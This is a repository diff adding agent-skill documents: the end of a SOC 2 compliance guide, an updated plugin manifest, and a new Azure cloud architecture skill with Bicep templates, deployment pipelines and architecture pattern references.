| Access Management | User access reviews, provisioning tickets | Role matrix, access logs |
| Change Management | Change tickets, approval records | Deployment logs, test results |
| Incident Response | Incident tickets, postmortems | Runbooks, escalation records |
| Vulnerability Management | Scan reports, patch records | Remediation timelines |
| Encryption | Configuration screenshots, certificate inventory | Key rotation logs |
| Backup & Recovery | Backup logs, DR test results | Recovery time measurements |
| Monitoring | Alert configurations, dashboard screenshots | On-call schedules, escalation records |
| Policy Management | Signed policies, version history | Training completion records |
| Vendor Management | Vendor assessments, SOC 2 reports | Contract reviews, risk registers |
### Automation Opportunities
| Area | Automation Approach |
|------|-------------------|
| Access reviews | Integrate IAM with ticketing (automatic quarterly review triggers) |
| Configuration evidence | Infrastructure-as-code snapshots, compliance-as-code tools |
| Vulnerability scans | Scheduled scanning with auto-generated reports |
| Change management | Git-based audit trail (commits, PRs, approvals) |
| Uptime monitoring | Automated SLA dashboards with historical data |
| Backup verification | Automated restore tests with success/failure logging |
### Continuous Monitoring
Move from point-in-time evidence collection to continuous compliance:
1. **Automated evidence gathering** — scripts that pull evidence on schedule
2. **Control dashboards** — real-time visibility into control status
3. **Alert-based monitoring** — notify when a control drifts out of compliance
4. **Evidence repository** — centralized, timestamped evidence storage
---
## Audit Readiness Checklist
### Pre-Audit Preparation (4-6 Weeks Before)
- [ ] All controls documented with descriptions, owners, and frequencies
- [ ] Evidence collected for the entire observation period (Type II)
- [ ] Control matrix reviewed and gaps remediated
- [ ] Policies signed and distributed within the last 12 months
- [ ] Access reviews completed within the required frequency
- [ ] Vulnerability scans current (no critical/high unpatched > SLA)
- [ ] Incident response plan tested within the last 12 months
- [ ] Vendor risk assessments current for all subservice organizations
- [ ] DR/BCP tested and documented within the last 12 months
- [ ] Employee security training completed for all staff
### Readiness Scoring
| Score | Rating | Meaning |
|-------|--------|---------|
| 90-100% | Audit Ready | Proceed with confidence |
| 75-89% | Minor Gaps | Address before scheduling audit |
| 50-74% | Significant Gaps | Remediation required |
| < 50% | Not Ready | Major program build-out needed |
### Common Audit Findings
| Finding | Root Cause | Prevention |
|---------|-----------|-----------|
| Incomplete access reviews | Manual process, no reminders | Automate quarterly review triggers |
| Missing change approvals | Emergency changes bypass process | Define emergency change procedure with post-hoc approval |
| Stale vulnerability scans | Scanner misconfigured | Automated weekly scans with alerting |
| Policy not acknowledged | No tracking mechanism | Annual e-signature workflow |
| Missing vendor assessments | No vendor inventory | Maintain vendor register with review schedule |
---
## Vendor Management
### Third-Party Risk Assessment
Every vendor that accesses, stores, or processes customer data must be assessed:
1. **Vendor inventory** — maintain a register of all service providers
2. **Risk classification** — categorize vendors by data access level
3. **Due diligence** — collect SOC 2 reports, security questionnaires, certifications
4. **Contractual protections** — ensure DPAs, security requirements, breach notification clauses
5. **Ongoing monitoring** — annual reassessment, continuous news monitoring
### Vendor Risk Tiers
| Tier | Data Access | Assessment Frequency | Requirements |
|------|-------------|---------------------|-------------|
| Critical | Processes/stores customer data | Annual + continuous monitoring | SOC 2 Type II, penetration test, security review |
| High | Accesses customer environment | Annual | SOC 2 Type II or equivalent, questionnaire |
| Medium | Indirect access, support tools | Annual questionnaire | Security certifications, questionnaire |
| Low | No data access | Biennial questionnaire | Basic security questionnaire |
### Subservice Organizations
When your SOC 2 report relies on controls at a subservice organization (e.g., AWS, GCP, Azure):
- **Inclusive method** — your report covers the subservice org's controls (requires their cooperation)
- **Carve-out method** — your report excludes their controls but references their SOC 2 report
- Most companies use **carve-out** and include complementary user entity controls (CUECs)
---
## Continuous Compliance
### From Point-in-Time to Continuous
| Aspect | Point-in-Time | Continuous |
|--------|---------------|-----------|
| Evidence collection | Manual, before audit | Automated, ongoing |
| Control monitoring | Periodic review | Real-time dashboards |
| Drift detection | Found during audit | Alert-based, immediate |
| Remediation | Reactive | Proactive |
| Audit preparation | 4-8 week scramble | Always ready |
### Implementation Steps
1. **Automate evidence gathering** — cron jobs, API integrations, IaC snapshots
2. **Build control dashboards** — aggregate control status into a single view
3. **Configure drift alerts** — notify when controls fall out of compliance
4. **Establish review cadence** — weekly control owner check-ins, monthly steering
5. **Maintain evidence repository** — centralized, timestamped, auditor-accessible
### Annual Re-Assessment Cycle
| Quarter | Activities |
|---------|-----------|
| Q1 | Annual risk assessment, policy refresh, vendor reassessment launch |
| Q2 | Internal control testing, remediation of findings |
| Q3 | Pre-audit readiness review, evidence completeness check |
| Q4 | External audit, management assertion, report distribution |
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Better Approach |
|--------------|-------------|----------------|
| Point-in-time compliance | Controls degrade between audits; gaps found during audit | Implement continuous monitoring and automated evidence |
| Manual evidence collection | Time-consuming, inconsistent, error-prone | Automate with scripts, IaC, and compliance platforms |
| Missing vendor assessments | Auditors flag incomplete vendor due diligence | Maintain vendor register with risk-tiered assessment schedule |
| Copy-paste policies | Generic policies don't match actual operations | Tailor policies to your actual environment and technology stack |
| Security theater | Controls exist on paper but aren't followed | Verify operating effectiveness; build controls into workflows |
| Skipping Type I | Jumping to Type II without foundational readiness | Start with Type I to validate control design before observation |
| Over-scoping TSC | Including all 5 categories when only Security is needed | Select categories based on actual customer/business requirements |
| Treating audit as a project | Compliance degrades after the report is issued | Build compliance into daily operations and engineering culture |
---
## Tools
### Control Matrix Builder
Generates a SOC 2 control matrix from selected TSC categories.
```bash
# Generate full security matrix in markdown
python scripts/control_matrix_builder.py --categories security --format md
# Generate matrix for multiple categories as JSON
python scripts/control_matrix_builder.py --categories security,availability,confidentiality --format json
# All categories, CSV output
python scripts/control_matrix_builder.py --categories security,availability,confidentiality,processing-integrity,privacy --format csv
```
### Evidence Tracker
Tracks evidence collection status per control.
```bash
# Check evidence status from a control matrix
python scripts/evidence_tracker.py --matrix controls.json --status
# JSON output for integration
python scripts/evidence_tracker.py --matrix controls.json --status --json
```
### Gap Analyzer
Analyzes current controls against SOC 2 requirements and identifies gaps.
```bash
# Type I gap analysis
python scripts/gap_analyzer.py --controls current_controls.json --type type1
# Type II gap analysis (includes operating effectiveness)
python scripts/gap_analyzer.py --controls current_controls.json --type type2 --json
```
---
## References
- [Trust Service Criteria Reference](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/references/trust_service_criteria.md) — All 5 TSC categories with sub-criteria, control objectives, and evidence examples
- [Evidence Collection Guide](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/references/evidence_collection_guide.md) — Evidence types per control, automation tools, documentation requirements
- [Type I vs Type II Comparison](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/soc2-compliance/references/type1_vs_type2.md) — Detailed comparison, timeline, cost analysis, and upgrade path
---
## Cross-References
- **[gdpr-dsgvo-expert](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/gdpr-dsgvo-expert/SKILL.md)** — SOC 2 Privacy criteria overlaps significantly with GDPR requirements; use together when processing EU personal data
- **[information-security-manager-iso27001](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/information-security-manager-iso27001/SKILL.md)** — ISO 27001 Annex A controls map closely to SOC 2 Security criteria; organizations pursuing both can share evidence
- **[isms-audit-expert](https://github.com/alirezarezvani/claude-skills/tree/main/ra-qm-team/isms-audit-expert/SKILL.md)** — Audit methodology and finding management patterns transfer directly to SOC 2 audit preparation

View File

@@ -1,6 +1,6 @@
{
"name": "engineering-skills",
"description": "26 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"description": "28 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), Azure cloud architect, security pen testing, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
"version": "2.1.2",
"author": {
"name": "Alireza Rezvani",

View File

@@ -0,0 +1,463 @@
---
name: "azure-cloud-architect"
description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization."
---
# Azure Cloud Architect
Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.
---
## Workflow
### Step 1: Gather Requirements
Collect application specifications:
```
- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and Azure experience level
- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
- Availability requirements (SLA, RPO/RTO)
- Region preferences (data residency, latency)
```
### Step 2: Design Architecture
Run the architecture designer to get pattern recommendations:
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 10000 \
--requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
```
**Example output:**
```json
{
"recommended_pattern": "app_service_web",
"service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
"estimated_monthly_cost_usd": 280,
"pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
"cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
}
```
Select from recommended patterns:
- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs
See `references/architecture_patterns.md` for detailed pattern specifications.
**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Generate IaC Templates
Create infrastructure-as-code for the selected pattern:
```bash
# Web app stack (Bicep)
python scripts/bicep_generator.py --arch-type web-app --output main.bicep
```
**Example Bicep output (core web app resources):**
```bicep
@description('The environment name')
param environment string = 'dev'
@description('The Azure region for resources')
param location string = resourceGroup().location
@description('The application name')
param appName string = 'myapp'
// App Service Plan
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
name: '${environment}-${appName}-plan'
location: location
sku: {
name: 'P1v3'
tier: 'PremiumV3'
capacity: 1
}
properties: {
reserved: true // Linux
}
}
// App Service
resource appService 'Microsoft.Web/sites@2023-01-01' = {
name: '${environment}-${appName}-web'
location: location
properties: {
serverFarmId: appServicePlan.id
httpsOnly: true
siteConfig: {
linuxFxVersion: 'NODE|20-lts'
minTlsVersion: '1.2'
ftpsState: 'Disabled'
alwaysOn: true
}
}
identity: {
type: 'SystemAssigned'
}
}
// Azure SQL Database
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
name: '${environment}-${appName}-sql'
location: location
properties: {
administrators: {
azureADOnlyAuthentication: true
}
minimalTlsVersion: '1.2'
}
}
resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
parent: sqlServer
name: '${appName}-db'
location: location
sku: {
name: 'GP_S_Gen5_2'
tier: 'GeneralPurpose'
}
properties: {
autoPauseDelay: 60
minCapacity: json('0.5')
}
}
```
> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and also available in `references/architecture_patterns.md`.
**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.
### Step 4: Review Costs
Analyze estimated costs and optimization opportunities:
```bash
python scripts/cost_optimizer.py \
--config current_resources.json \
--json
```
**Example output:**
```json
{
"current_monthly_usd": 2000,
"recommendations": [
{ "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
{ "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
{ "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
],
"total_potential_savings_usd": 735
}
```
Output includes:
- Monthly cost breakdown by service
- Right-sizing recommendations
- Reserved Instance and Savings Plan opportunities
- Potential monthly savings
### Step 5: Configure CI/CD
Set up Azure DevOps Pipelines or GitHub Actions with Azure:
```yaml
# GitHub Actions — deploy Bicep to Azure
name: Deploy Infrastructure
on:
push:
branches: [main]
permissions:
id-token: write
contents: read
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: azure/login@v2
with:
client-id: ${{ secrets.AZURE_CLIENT_ID }}
tenant-id: ${{ secrets.AZURE_TENANT_ID }}
subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
- uses: azure/arm-deploy@v2
with:
resourceGroupName: rg-myapp-dev
template: ./infra/main.bicep
parameters: environment=dev
```
```yaml
# Azure DevOps Pipeline
trigger:
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
steps:
- task: AzureCLI@2
inputs:
azureSubscription: 'MyServiceConnection'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
az deployment group create \
--resource-group rg-myapp-dev \
--template-file infra/main.bicep \
--parameters environment=dev
```
### Step 6: Security Review
Validate security posture before production:
- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
- **Secrets**: Key Vault for all secrets, certificates, and connection strings
- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives
**If deployment fails:**
1. Check the deployment status:
```bash
az deployment group show \
--resource-group rg-myapp-dev \
--name main \
--query 'properties.error'
```
2. Review Activity Log for RBAC or policy errors.
3. Validate the Bicep template before deploying:
```bash
az bicep build --file main.bicep
az deployment group validate \
--resource-group rg-myapp-dev \
--template-file main.bicep
```
**Common failure causes:**
- RBAC permission errors — verify the deploying principal has Contributor on the resource group
- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
- Naming conflicts — Azure resource names are often globally unique (storage accounts, web apps)
- Quota exceeded — request quota increase via Azure Portal > Subscriptions > Usage + quotas
---
## Tools
### architecture_designer.py
Generates architecture pattern recommendations based on requirements.
```bash
python scripts/architecture_designer.py \
--app-type web_app \
--users 50000 \
--requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
--json
```
**Input:** Application type, expected users, JSON requirements
**Output:** Recommended pattern, service stack, cost estimate, pros/cons
### cost_optimizer.py
Analyzes Azure resource configurations for cost savings.
```bash
python scripts/cost_optimizer.py --config resources.json --json
```
**Input:** JSON file with current Azure resource inventory
**Output:** Recommendations for:
- Idle resource removal
- VM and database right-sizing
- Reserved Instance purchases
- Storage tier transitions
- Unused public IPs and load balancers
### bicep_generator.py
Generates Bicep template scaffolds from architecture type.
```bash
python scripts/bicep_generator.py --arch-type microservices --output main.bicep
```
**Output:** Production-ready Bicep templates with:
- Managed Identity (no passwords)
- Key Vault integration
- Diagnostic settings for Azure Monitor
- Network security groups
- Tags for cost allocation
---
## Quick Start
### Web App Architecture (< $100/month)
```
Ask: "Design an Azure web app for a startup with 5000 users"
Result:
- App Service (B1 Linux) for the application
- Azure SQL Serverless for relational data
- Azure Blob Storage for static assets
- Front Door (free tier) for CDN and routing
- Key Vault for secrets
- Estimated: $40-80/month
```
### Microservices on AKS ($500-2000/month)
```
Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"
Result:
- AKS cluster with 3 node pools (system, app, jobs)
- API Management for gateway and rate limiting
- Cosmos DB for multi-model data
- Service Bus for async messaging
- Azure Monitor + Application Insights for observability
- Multi-zone deployment
```
### Serverless Event-Driven (< $200/month)
```
Ask: "Design an event-driven backend for processing orders"
Result:
- Azure Functions (Consumption plan) for compute
- Event Grid for event routing
- Service Bus for reliable messaging
- Cosmos DB for order data
- Application Insights for monitoring
- Estimated: $30-150/month depending on volume
```
### Data Pipeline ($300-1500/month)
```
Ask: "Design a data pipeline for ingesting 10M events/day"
Result:
- Event Hubs for ingestion
- Stream Analytics or Functions for processing
- Data Lake Storage Gen2 for raw data
- Synapse Analytics for warehouse
- Power BI for dashboards
```
---
## Input Requirements
Provide these details for architecture design:
| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly Azure limit | $500/month max |
| Team context | Size, Azure experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |
**JSON Format:**
```json
{
"application_type": "saas_platform",
"expected_users": 10000,
"requests_per_second": 100,
"budget_monthly_usd": 500,
"team_size": 3,
"azure_experience": "intermediate",
"compliance": ["SOC2"],
"availability_sla": "99.9%"
}
```
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Do This Instead |
|---|---|---|
| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly |
| Shared resource groups for everything | Blast radius, RBAC nightmares | One resource group per environment per workload |
| No tagging strategy | Cannot track costs or ownership | Tag: environment, owner, cost-center, app-name |
| Using classic resources | Deprecated, limited features | Use ARM/Bicep resources exclusively |
---
## Output Formats
### Architecture Design
- Pattern recommendation with rationale
- Service stack diagram (ASCII)
- Monthly cost estimate and trade-offs
### IaC Templates
- **Bicep**: Recommended — first-party, module support, clean syntax
- **ARM JSON**: Generated from Bicep when needed
- **Terraform HCL**: Multi-cloud compatible using azurerm provider
### Cost Analysis
- Current spend breakdown with optimization recommendations
- Priority action list (high/medium/low) and implementation checklist
---
## Cross-References
| Skill | Relationship |
|-------|-------------|
| `engineering-team/aws-solution-architect` | AWS equivalent — same 6-step workflow, different services |
| `engineering-team/gcp-cloud-architect` | GCP equivalent — completes the cloud trifecta |
| `engineering-team/senior-devops` | Broader DevOps scope — pipelines, monitoring, containerization |
| `engineering/terraform-patterns` | IaC implementation — use for Terraform modules targeting Azure |
| `engineering/ci-cd-pipeline-builder` | Pipeline construction — automates Azure DevOps and GitHub Actions |
---
## Reference Documentation
| Document | Contents |
|----------|----------|
| `references/architecture_patterns.md` | 5 patterns: web app, microservices/AKS, serverless, data pipeline, multi-region |
| `references/service_selection.md` | Decision matrices for compute, database, storage, messaging, networking |
| `references/best_practices.md` | Naming conventions, tagging, RBAC, network security, monitoring, DR |

View File

@@ -0,0 +1,413 @@
# Azure Architecture Patterns
Reference guide for selecting the right Azure architecture pattern based on application requirements.
---
## Table of Contents
- [Pattern Selection Matrix](#pattern-selection-matrix)
- [Pattern 1: App Service Web Application](#pattern-1-app-service-web-application)
- [Pattern 2: Microservices on AKS](#pattern-2-microservices-on-aks)
- [Pattern 3: Serverless Event-Driven](#pattern-3-serverless-event-driven)
- [Pattern 4: Data Pipeline](#pattern-4-data-pipeline)
- [Pattern 5: Multi-Region Active-Active](#pattern-5-multi-region-active-active)
- [Well-Architected Framework Alignment](#well-architected-framework-alignment)
---
## Pattern Selection Matrix
| Pattern | Best For | Users | Monthly Cost | Complexity |
|---------|----------|-------|--------------|------------|
| App Service Web | MVPs, SaaS, APIs | <100K | $50-500 | Low |
| Microservices on AKS | Complex platforms, multi-team | Any | $500-5000 | High |
| Serverless Event-Driven | Event processing, webhooks, APIs | <1M | $20-500 | Low-Medium |
| Data Pipeline | Analytics, ETL, ML | Any | $200-3000 | Medium-High |
| Multi-Region Active-Active | Global apps, 99.99% uptime | >100K | 1.5-2x single | High |
---
## Pattern 1: App Service Web Application
### Architecture
```
┌──────────────┐
│ Azure Front │
│ Door │
│ (CDN + WAF) │
└──────┬───────┘
┌──────▼───────┐
│ App Service │
│ (Linux P1v3)│
│ + Slots │
└──┬───────┬───┘
│ │
┌────────▼──┐ ┌──▼────────┐
│ Azure SQL │ │ Blob │
│ Serverless │ │ Storage │
└────────────┘ └───────────┘
┌────────▼──────────┐
│ Key Vault │
│ (secrets, certs) │
└───────────────────┘
```
### Services
| Service | Purpose | Configuration |
|---------|---------|---------------|
| Azure Front Door | Global CDN, WAF, SSL | Standard or Premium tier, custom domain |
| App Service | Web application hosting | Linux P1v3 (production), B1 (dev) |
| Azure SQL Database | Relational database | Serverless GP_S_Gen5_2 with auto-pause |
| Blob Storage | Static assets, uploads | Hot tier with lifecycle policies |
| Key Vault | Secrets management | RBAC authorization, soft-delete enabled |
| Application Insights | Monitoring and APM | Workspace-based, connected to Log Analytics |
| Entra ID | Authentication | Easy Auth or MSAL library |
### Deployment Strategy
- **Deployment slots**: staging slot for zero-downtime deploys, swap to production after validation
- **Auto-scale**: CPU-based rules, 1-10 instances in production
- **Health checks**: `/health` endpoint monitored by App Service and Front Door
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| App Service | $13 (B1) | $75 (P1v3) |
| Azure SQL | $5 (Basic) | $40-120 (Serverless GP) |
| Front Door | $0 (disabled) | $35-55 |
| Blob Storage | $1 | $5-15 |
| Key Vault | $0.03 | $1-5 |
| Application Insights | $0 (free tier) | $5-20 |
| **Total** | **~$19** | **~$160-290** |
---
## Pattern 2: Microservices on AKS
### Architecture
```
┌──────────────┐
│ Azure Front │
│ Door │
└──────┬───────┘
┌──────▼───────┐
│ API Mgmt │
│ (gateway) │
└──────┬───────┘
┌────────────▼────────────┐
│ AKS Cluster │
│ ┌───────┐ ┌───────┐ │
│ │ svc-A │ │ svc-B │ │
│ └───┬───┘ └───┬───┘ │
│ │ │ │
│ ┌───▼─────────▼───┐ │
│ │ Service Bus │ │
│ │ (async msgs) │ │
│ └─────────────────┘ │
└─────────────────────────┘
│ │
┌────────▼──┐ ┌──▼────────┐
│ Cosmos DB │ │ ACR │
│ (data) │ │ (images) │
└────────────┘ └───────────┘
```
### Services
| Service | Purpose | Configuration |
|---------|---------|---------------|
| AKS | Container orchestration | 3 node pools: system (D2s_v5), app (D4s_v5), jobs (spot) |
| API Management | API gateway, rate limiting | Standard v2 or Consumption tier |
| Cosmos DB | Multi-model database | Session consistency, autoscale RU/s |
| Service Bus | Async messaging | Standard tier, topics for pub/sub |
| Container Registry | Docker image storage | Basic (dev), Standard (prod) |
| Key Vault | Secrets for pods | CSI driver + workload identity |
| Azure Monitor | Cluster and app observability | Container Insights + App Insights |
### AKS Best Practices
**Node Pools:**
- System pool: 2-3 nodes, D2s_v5, taints for system pods only
- App pool: 2-10 nodes (autoscaler), D4s_v5, for application workloads
- Jobs pool: spot instances, for batch processing and CI runners
**Networking:**
- Azure CNI for VNet-native pod networking
- Network policies (Azure or Calico) for pod-to-pod isolation
- Ingress via NGINX Ingress Controller or Application Gateway Ingress Controller (AGIC)
**Security:**
- Workload Identity for pod-to-Azure service auth (replaces pod identity)
- Azure Policy for Kubernetes (OPA Gatekeeper)
- Defender for Containers for runtime threat detection
- Private cluster for production (API server not exposed to internet)
**Deployment:**
- Helm charts for application packaging
- Flux or ArgoCD for GitOps
- Horizontal Pod Autoscaler (HPA) + KEDA for event-driven scaling
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| AKS nodes (system) | $60 (1x D2s_v5) | $180 (3x D2s_v5) |
| AKS nodes (app) | $120 (1x D4s_v5) | $360 (3x D4s_v5) |
| API Management | $0 (Consumption) | $175 (Standard v2) |
| Cosmos DB | $25 (serverless) | $100-400 (autoscale) |
| Service Bus | $10 | $10-50 |
| Container Registry | $5 | $20 |
| Monitoring | $0 | $50-100 |
| **Total** | **~$220** | **~$900-1300** |
---
## Pattern 3: Serverless Event-Driven
### Architecture
```
┌──────────┐ ┌──────────┐ ┌──────────┐
│ HTTP │ │ Blob │ │ Timer │
│ Trigger │ │ Trigger │ │ Trigger │
└────┬─────┘ └────┬─────┘ └────┬─────┘
│ │ │
└────────┬───────┘─────────┬───────┘
│ │
┌──────▼───────┐ ┌──────▼───────┐
│ Azure │ │ Azure │
│ Functions │ │ Functions │
│ (handlers) │ │ (workers) │
└──┬────┬──────┘ └──────┬───────┘
│ │ │
┌─────────▼┐ ┌─▼──────────┐ ┌─▼──────────┐
│ Event │ │ Service │ │ Cosmos DB │
│ Grid │ │ Bus Queue │ │ (data) │
│ (fanout) │ │ (reliable) │ │ │
└──────────┘ └────────────┘ └────────────┘
```
### Services
| Service | Purpose | Configuration |
|---------|---------|---------------|
| Azure Functions | Event handlers, APIs | Consumption plan (dev), Premium (prod) |
| Event Grid | Event routing and fan-out | System + custom topics |
| Service Bus | Reliable messaging with DLQ | Basic or Standard, queues + topics |
| Cosmos DB | Low-latency data store | Serverless (dev), autoscale (prod) |
| Blob Storage | File processing triggers | Lifecycle policies |
| Application Insights | Function monitoring | Sampling at 5-10% for high volume |
### Durable Functions Patterns
Use Durable Functions for orchestration instead of building custom state machines:
| Pattern | Use Case | Example |
|---------|----------|---------|
| Function chaining | Sequential steps | Order: validate -> charge -> fulfill -> notify |
| Fan-out/fan-in | Parallel processing | Process all images in a batch, aggregate results |
| Async HTTP APIs | Long-running operations | Start job, poll for status, return result |
| Monitor | Periodic polling | Check external API until condition met |
| Human interaction | Approval workflows | Send approval email, wait for response with timeout |
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| Functions (Consumption) | $0 (1M free) | $5-30 |
| Event Grid | $0 | $0-5 |
| Service Bus | $0 (Basic) | $10-30 |
| Cosmos DB | $0 (serverless free tier) | $25-150 |
| Blob Storage | $1 | $5-15 |
| Application Insights | $0 | $5-15 |
| **Total** | **~$1** | **~$50-245** |
---
## Pattern 4: Data Pipeline
### Architecture
```
┌──────────┐ ┌──────────┐
│ IoT/Apps │ │ Batch │
│ (events) │ │ (files) │
└────┬─────┘ └────┬─────┘
│ │
┌────▼─────┐ ┌────▼─────┐
│ Event │ │ Data │
│ Hubs │ │ Factory │
└────┬─────┘ └────┬─────┘
│ │
└────────┬───────┘
┌────────▼────────┐
│ Data Lake │
│ Storage Gen2 │
│ (raw/curated) │
└────────┬────────┘
┌────────▼────────┐
│ Synapse │
│ Analytics │
│ (SQL + Spark) │
└────────┬────────┘
┌────────▼────────┐
│ Power BI │
│ (dashboards) │
└─────────────────┘
```
### Services
| Service | Purpose | Configuration |
|---------|---------|---------------|
| Event Hubs | Real-time event ingestion | Standard, 2-8 partitions |
| Data Factory | Batch ETL orchestration | Managed, 90+ connectors |
| Data Lake Storage Gen2 | Raw and curated data lake | HNS enabled, lifecycle policies |
| Synapse Analytics | SQL and Spark analytics | Serverless SQL pool (pay-per-query) |
| Azure Functions | Lightweight processing | Triggered by Event Hubs or Blob |
| Power BI | Business intelligence | Pro ($10/user/month) |
### Data Lake Organization
```
data-lake/
├── raw/ # Landing zone — immutable source data
│ ├── source-system-a/
│ │ └── YYYY/MM/DD/ # Date-partitioned
│ └── source-system-b/
├── curated/ # Cleaned, validated, business-ready
│ ├── dimension/
│ └── fact/
├── sandbox/ # Ad-hoc exploration
└── archive/ # Cold storage (lifecycle policy target)
```
### Cost Estimate
| Component | Dev | Production |
|-----------|-----|-----------|
| Event Hubs (1 TU) | $22 | $44-176 |
| Data Factory | $0 (free tier) | $50-200 |
| Data Lake Storage | $5 | $20-80 |
| Synapse Serverless SQL | $5 | $50-300 |
| Azure Functions | $0 | $5-20 |
| Power BI Pro | $10/user | $10/user |
| **Total** | **~$42** | **~$180-800** |
---
## Pattern 5: Multi-Region Active-Active
### Architecture
```
┌──────────────┐
│ Azure Front │
│ Door (Global│
│ LB + WAF) │
└──┬────────┬──┘
│ │
┌──────────▼──┐ ┌──▼──────────┐
│ Region 1 │ │ Region 2 │
│ (East US) │ │ (West EU) │
│ │ │ │
│ App Service │ │ App Service │
│ + SQL │ │ + SQL │
│ + Redis │ │ + Redis │
└──────┬──────┘ └──────┬──────┘
│ │
┌──────▼───────────────▼──────┐
│ Cosmos DB │
│ (multi-region writes) │
│ Session consistency │
└─────────────────────────────┘
```
### Multi-Region Design Decisions
| Decision | Recommendation | Rationale |
|----------|---------------|-----------|
| Global load balancer | Front Door Premium | Built-in WAF, CDN, health probes, fastest failover |
| Database replication | Cosmos DB multi-write or SQL failover groups | Cosmos for global writes, SQL for relational needs |
| Session state | Azure Cache for Redis (per region) | Local sessions, avoid cross-region latency |
| Static content | Front Door CDN | Edge-cached, no origin required |
| DNS strategy | Front Door handles routing | No separate Traffic Manager needed |
| Failover | Automatic (Front Door health probes) | 10-30 second detection, automatic reroute |
### Azure SQL Failover Groups vs Cosmos DB Multi-Region
| Feature | SQL Failover Groups | Cosmos DB Multi-Region |
|---------|-------------------|----------------------|
| Replication | Async (RPO ~5s) | Sync or async (configurable) |
| Write region | Single primary | Multi-write capable |
| Failover | Automatic or manual (60s grace) | Automatic |
| Consistency | Strong (single writer) | 5 levels (session recommended) |
| Cost | 2x compute (active-passive) | Per-region RU/s charge |
| Best for | Relational data, transactions | Document data, global low-latency |
### Cost Impact
Multi-region typically costs 1.5-2x single region:
- Compute: 2x (running in both regions)
- Database: 1.5-2x (replication, multi-write)
- Networking: Additional cross-region data transfer (~$0.02-0.05/GB)
- Front Door Premium: ~$100-200/month
---
## Well-Architected Framework Alignment
Every architecture pattern should address all five pillars of the Azure Well-Architected Framework.
### Reliability
- Deploy across Availability Zones (zone-redundant App Service, AKS, SQL)
- Enable health probes at every layer
